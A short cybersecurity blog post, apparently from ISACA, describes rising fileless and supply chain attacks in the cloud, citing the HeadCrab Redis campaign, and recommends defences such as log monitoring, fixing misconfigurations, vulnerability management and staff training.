Scalability, flexibility, agility, high performance and user-friendliness have helped organizations pivot toward cloud computing. Cloud is a dynamic landscape that keeps evolving, bringing with it complexities that lead to security concerns. One of the notable recent challenges has been fileless attack techniques, using legitimate software to infect a machine.
Since these attacks do not rely on files, no installation is required, making them hard to detect. These are also known as Living off the Land or LOLbins. There has been a whooping 1,400 percent increase in fileless attacks in 2022, according to the recent Aqua Nautilus Cybersecurity Report. Those totals include a highly sophisticated campaign – the “HeadCrab Campaign.” The custom-made malware used by the threat actor has at least 1,200 Redis servers under their control. These compromised servers are suspected to have cryptocurrency miners installed on them.
Public cloud misconfigurations remain the most popular way for threat actors to break in. There are hundreds of thousands of misconfigured cloud resources, including servers, APIs and containers that are exposed to the world.
The Aqua Nautilus Cybersecurity Report also indicates that software supply chain attacks saw an increase of 300 percent, year-over-year. Adversaries are now focusing on evading defense systems and obscuring campaigns to establish an anchorage in compromised systems. So, what can we do to strengthen our defenses?
Regular monitoring and analysis. Collect and analyze logs from various infrastructure elements and cloud services. A security information and event monitoring (SIEM) along with user behavioral analytics (UBA) tool can help detect and respond to malicious activities. An intrusion detection and prevention system (IDPS) monitors and detects suspicious network traffic. IDPS also has the ability to block traffic.
Fix misconfigurations. Establish baseline configurations. Industry standards, like CIS benchmarks and NIST, provide a good starting point. Monitor for misconfigurations and fix them in a timely manner to avoid the risk of being exposed or vulnerable to attacks. A cloud security posture management (CSPM) tool can aid with minimizing misconfigurations and monitoring them against a tolerable baseline.
Remediate vulnerabilities. An effective vulnerability management program must be established to reduce the risk of vulnerabilities getting exploited. Zero-day vulnerabilities must be triaged, and appropriate steps must be taken to protect vulnerable systems and reduce risk to the organization.
Protect the supply chain. Organizations must ensure adequate processes, procedures, policies and documentation are in place for protecting systems that are dependent on the software supply chain.
Explore training and education. Last but not the least, training and education are extremely important. With the ever-evolving cloud computing and interdependency of software, education helps individuals stay up to date and play their part in creating a secure environment.
Editor’s note: For more cloud resources from ISACA, explore the Cloud Fundamentals Certificate and the Certificate of Cloud Auditing Knowledge.